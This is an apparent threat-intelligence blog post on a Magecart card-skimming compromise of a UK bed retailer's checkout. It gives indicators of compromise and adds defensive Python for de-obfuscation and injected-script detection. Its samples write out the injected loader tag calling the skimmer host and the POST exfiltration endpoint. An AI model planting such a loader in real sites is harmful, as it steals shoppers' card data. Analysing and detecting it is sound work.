Magecart Appears to Have Targeted Another Online Retailer

www.sueno.co.uk, a UK-based eCommerce retailer selling luxury beds, furniture and mattresses, appears to be the latest victim of the Magecart card-skimming group.

Background on the Magecart group can be found in blog posts by RiskIQ and Volexity.

Numerous tips and open source intelligence have revealed the Sueno site as compromised by Magecart. A script injected into the site's shopping cart loads externally hosted JavaScript from magento.name/mage/mage.js, which performs the data theft.

Shown above: Injected script found at www.sueno.co.uk/checkout/onepage/, Sueno's checkout page, which loads a script from magento.name/mage/mage.js

This domain is currently hosted in Russia on the IP address 83.166.243.206.

Shown above: Records show the domain was registered as recently as 6 September 2018

The externally hosted script carries the actual skimming logic. It is obfuscated, with a large portion of it hex-encoded so that the field names and exfiltration URL are not visible in plain text.

Shown above: Obfuscated script “mage.js” found on domain magento.name/mage/

Decoding this script reveals the following:

Shown above: De-obfuscated script used to skim credit card information, pointing to magento.name/mage/mail2.php
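The decoding step described above, as an added example that is not part of the original post and not the real mage.js: a small Python de-obfuscator that reverses the string encodings skimmers of this type commonly use (\xNN and \uNNNN escapes plus String.fromCharCode(...) calls) and pulls out any URL that becomes visible, which is how the exfiltration endpoint is recovered. The obfuscated sample is constructed inside the block, and the field names cc_number and cc_cid are assumed for illustration.

```python
"""Decode the string encodings a Magecart-style skimmer uses to hide field
names and its exfiltration URL. The sample input is constructed here and is
NOT the script recovered from magento.name."""
import re


def _hex_escape(s: str) -> str:
    """Encode a string as JavaScript \\xNN escapes (only used to BUILD the sample)."""
    return "".join(f"\\x{ord(c):02x}" for c in s)


def _from_char_code(s: str) -> str:
    """Encode a string as a String.fromCharCode(...) call (only used to BUILD the sample)."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"


# Constructed skimmer fragment: field names (assumed) and the exfil URL are hidden
# with \xNN escapes, String.fromCharCode() and \uNNNN escapes respectively.
SAMPLE_OBFUSCATED = (
    'var f=["' + _hex_escape("cc_number") + '","' + _hex_escape("cc_cid") + '"];\n'
    'var u=' + _from_char_code("https://magento.name/mage/mail2.php") + ';\n'
    'var m="\\u0050\\u004f\\u0053\\u0054";\n'
)


def decode_hex_escapes(js: str) -> str:
    """Replace \\xNN and \\uNNNN escape sequences with the characters they encode."""
    js = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), js)
    js = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), js)
    return js


def decode_from_char_code(js: str) -> str:
    """Replace String.fromCharCode(n1,n2,...) calls with a quoted string literal."""
    def repl(m: re.Match) -> str:
        codes = [int(x) for x in m.group(1).split(",") if x.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return re.sub(r"String\.fromCharCode\(\s*([\d,\s]+)\)", repl, js)


def deobfuscate(js: str) -> str:
    """Apply every decoding pass; the result is readable enough to spot the exfil URL."""
    return decode_from_char_code(decode_hex_escapes(js))


URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"']*)?")


def extract_urls(js: str) -> list:
    """Return every URL visible in the decoded script (candidate exfil endpoints)."""
    return sorted(set(URL_RE.findall(deobfuscate(js))))


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_OBFUSCATED))
    print("Candidate exfil endpoints:", extract_urls(SAMPLE_OBFUSCATED))
```

Real samples usually layer these encodings inside an array-lookup wrapper, so in practice the decoded text is searched for the POST target and the list of input field IDs rather than read top to bottom; the URL regex above is what turns the decoded blob into an indicator you can block.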

The decoded script looks for specific input fields on the checkout form, captures their values and submits them over HTTPS via a POST request to magento.name/mage/mail2.php.

Shown above: Credit card information being posted to magento.name/mage/mail2.php
Shown above: Raw packet capture showing credit card data transmitted to magento.name, with www.sueno.co.uk as the referring page.
Indicators of Compromise:

mage.js – obfuscated JavaScript used to skim credit card data
SHA-256: 02f6d828a4909b11f8c139055d09a48e52243c147efa542942b7cbd3b79c5fe6

magento.name – domain hosted by the credit card theft group
magento.name/mage/mage.js – skimmer script loaded into the Sueno checkout page
magento.name/mage/mail2.php – exfiltration endpoint receiving the skimmed card data via POST
83.166.243.206 – IP address currently hosting magento.name (Russia)
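One way to put these indicators to work when checking a Magento checkout page for the same injection, as an added example that is not part of the original post: parse the page, flag every script tag whose host is not on an allowlist of expected first-party hosts, and compare the SHA-256 of any fetched script body against the hash above. The checkout HTML and the allowlist are constructed for illustration; the only real value is the mage.js hash.

```python
"""Hunt for an injected third-party script loader in a checkout page and match
script bodies against known-bad SHA-256 hashes. The HTML below is a constructed
sample; KNOWN_BAD_SHA256 carries the mage.js hash from this post."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Hosts the checkout is expected to load script from (assumed allowlist).
ALLOWED_SCRIPT_HOSTS = {"www.sueno.co.uk"}

# Known-bad script hashes: the SHA-256 of mage.js reported above.
KNOWN_BAD_SHA256 = {
    "02f6d828a4909b11f8c139055d09a48e52243c147efa542942b7cbd3b79c5fe6",
}

# Constructed checkout page: one first-party script plus the injected loader.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="/js/prototype.js"></script>
<script type="text/javascript" src="https://magento.name/mage/mage.js"></script>
</head><body><form id="co-payment-form"></form></body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in the page."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def external_script_hosts(html: str, page_url: str) -> list:
    """Return (absolute_url, host) for each script src whose host is not allowlisted.

    Relative paths are resolved against page_url so first-party scripts are not flagged.
    """
    parser = ScriptSrcCollector()
    parser.feed(html)
    flagged = []
    for src in parser.srcs:
        absolute = urljoin(page_url, src)
        host = urlsplit(absolute).hostname or ""
        if host not in ALLOWED_SCRIPT_HOSTS:
            flagged.append((absolute, host))
    return flagged


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_known_bad(script_body: bytes, bad_hashes: set) -> bool:
    """True when the script body's SHA-256 is one of the known-bad hashes."""
    return sha256_hex(script_body) in bad_hashes


if __name__ == "__main__":
    page = "https://www.sueno.co.uk/checkout/onepage/"
    for url, host in external_script_hosts(SAMPLE_CHECKOUT_HTML, page):
        print(f"off-host script on checkout page: {url} (host {host})")
        # In a live check, fetch url here and run matches_known_bad() on the body.
```

Hash matching only catches the exact file; attackers re-obfuscate regularly, so the off-host script check is the durable signal. A Content-Security-Policy script-src restricted to the allowlisted hosts would have blocked this loader outright and, with report-uri, would have surfaced the injection attempt.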